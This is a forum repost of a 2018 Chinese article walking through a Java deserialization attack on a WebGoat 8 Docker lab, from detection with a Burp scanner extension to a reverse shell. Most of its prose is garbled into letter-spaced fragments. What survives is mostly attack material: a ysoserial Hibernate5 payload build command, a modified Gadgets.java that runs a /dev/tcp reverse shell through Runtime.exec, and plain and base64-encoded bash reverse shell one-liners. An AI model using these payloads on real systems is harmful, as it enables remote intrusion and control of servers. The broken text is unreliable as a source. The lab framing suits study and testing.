搜索

[13395] 2018-11-09_Java反序列化漏洞:在受限环境中从漏洞发现到获取反向Shell

文档创建者:s7ckTeam
浏览次数:41
最后更新:2025-01-18
2018-11-09_Java反序列化漏洞:在受限环境中从漏洞发现到获取反向Shell J a v a S h e l l s e c i s t   F r e e B u f   2 0 1 8 - 1 1 - 0 9 J a v a J a v a J a v a 2 0 1 5 A p p S e c C a l i C h r i s   F r o h o f f     G a b r i e l   L a w r e n c e M a r s h a l l i n g   P i c k l e s J a v a A p a c h e   C o m m o n s C o l l e c t i o n s J a v a P a y l o a d y s o s e r i a l W e b G o a t   8 D o c k e r s h e l l B a s e 6 4 J a v a P O P B u r p J a v a - D e s e r i a l i z a t i o n - S c a n n e r 2 y s o s e r i a l e x p l o i t
B u r p e x p l o i t a t i o n y s o s e r i a l H i b e r n a t e   5   ( S l e e p ) :   P o t e n t i a l l y   V U L N E R A B L E ! ! !
y s o s e r i a l P O P H i b e r n a t e 使 p a y l o a d p a y l o a d s l e e p h t t p s : / / g i t h u b . c o m / f e d e r i c o d o t t a / J a v a - D e s e r i a l i z a t i o n - S c a n n e r / b l o b / m a s t e r / s r c / b u r p / B u r p E x t e n d e r . j a v a p a y l o a d p a y l o a d 使
y s o s e r i a l 使 p a y l o a d y s o s e r i a l 使 H i b e r n a t e   5 使 H i b e r n a t e   5 y s o s e r i a l j a v a x . e l p o m . x m l P u l l 便 h i b e r n a t e 5 使 y s o s e r i a l 使 p a y l o a d m v n   c l e a n   p a c k a g e   - D s k i p T e s t s   - D h i b e r n a t e 5 j a v a   - D h i b e r n a t e 5   - j a r   t a r g e t / y s o s e r i a l - 0 . 0 . 6 - S N A P S H O T - a l l . j a r   H i b e r n a t e 1   " t o u c h   / t m p / t e s t "   |   b a s e 6 4   - w 0
访 d o c k e r p a y l o a d P e r l B a s h s h e l l p a y l o a d P e n t e s t   M o n k e y s s h e l l d o c k e r   e x e c   - i t   < C O N T A I N E R _ I D >   / b i n / b a s h w e b g o a t @ 1 d 1 4 2 c c c 6 9 e c : / $   w h i c h   p h p w e b g o a t @ 1 d 1 4 2 c c c 6 9 e c : / $   w h i c h   p y t h o n w e b g o a t @ 1 d 1 4 2 c c c 6 9 e c : / $   w h i c h   p y t h o n 3 w e b g o a t @ 1 d 1 4 2 c c c 6 9 e c : / $   w h i c h   w g e t w e b g o a t @ 1 d 1 4 2 c c c 6 9 e c : / $   w h i c h   c u r l w e b g o a t @ 1 d 1 4 2 c c c 6 9 e c : / $   w h i c h   n c w e b g o a t @ 1 d 1 4 2 c c c 6 9 e c : / $   w h i c h   p e r l / u s r / b i n / p e r l w e b g o a t @ 1 d 1 4 2 c c c 6 9 e c : / $   w h i c h   b a s h / b i n / b a s h w e b g o a t @ 1 d 1 4 2 c c c 6 9 e c : / $
h t t p : / / p e n t e s t m o n k e y . n e t / c h e a t - s h e e t / s h e l l s / r e v e r s e - s h e l l - c h e a t - s h e e t B a s h s h e l l j a v a . l a n g . R u n t i m e . e x e c ( ) s h e l l J a v a s h e l l G a d g e t s . j a v a s h e l l   p a y l o a d 1 1 6 1 1 8 P e n t e s t   M o n k e y s J a v a s h e l l y s o s e r i a l p a y l o a d s h e l l b a s h   - i   > &   / d e v / t c p / 1 0 . 0 . 0 . 1 / 8 0 8 0   0 > & 1 / r o o t / y s o s e r i a l / s r c / m a i n / j a v a / y s o s e r i a l / p a y l o a d s / u t i l / G a d g e t s . j a v a r   =   R u n t i m e . g e t R u n t i m e ( ) p   =   r . e x e c ( [ " / b i n / b a s h " , " - c " , " e x e c   5 < > / d e v / t c p / 1 0 . 0 . 0 . 1 / 2 0 0 2 ; c a t   < & 5   |   w h i l e   r e a d   l i n e ;   d o   $ l i n e   2 > & 5   > & 5 ;   d o n e " ]   a s   S t r i n g [ ] ) p . w a i t F o r ( ) S t r i n g   c m d   =   " j a v a . l a n g . R u n t i m e . g e t R u n t i m e ( ) . e x e c ( n e w   S t r i n g   [ ] { " / b i n / b a s h " , " - c " , " e x e c   5 < > / d e v / t c p / 1 0 . 0 . 0 . 1 / 8 0 8 0 ; c a t   < & 5   |   w h i l e   r e a d   l i n e ;   d o   $ l i n e   2 > & 5   > & 5 ;   d o n e " } ) . w a i t F o r ( ) ; " ; c l a z z . m a k e C l a s s I n i t i a l i z e r ( ) . i n s e r t A f t e r ( c m d ) ;
P a y l o a d h t t p : / / j a c k s o n . t h u r a i s a m y . m e / r u n t i m e - e x e c - p a y l o a d s . h t m l B a s h s h e l l p a y l o a d W A F ~ 1 h t t p s : / / n i c k b l o o r . c o . u k / 2 0 1 7 / 0 8 / 1 3 / a t t a c k i n g - j a v a - d e s e r i a l i z a t i o n / 2 h t t p : / / w w w . p w n t e s t e r . c o m / b l o g / 2 0 1 3 / 1 2 / 1 6 / c v e - 2 0 1 1 - 2 8 9 4 - d e s e r i a l i z a t i o n - s p r i n g - r c e / b a s h   - i   > &   / d e v / t c p / [ I P   a d d r e s s ] / [ p o r t ]   0 > & 1 b a s h   - c   { e c h o , Y m F z a C A t a S A + J i A v Z G V 2 L 3 R j c C 8 x M C 4 x M C 4 x M C 4 x L z g w O D A g M D 4 m M Q = = } | { b a s e 6 4 , - d } | { b a s h , - i }
3 h t t p s : / / g i t h u b . c o m / f r o h o f f / y s o s e r i a l 4 h t t p s : / / g i t h u b . c o m / f e d e r i c o d o t t a / J a v a - D e s e r i a l i z a t i o n - S c a n n e r * m e d i u m F B s e c i s t F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理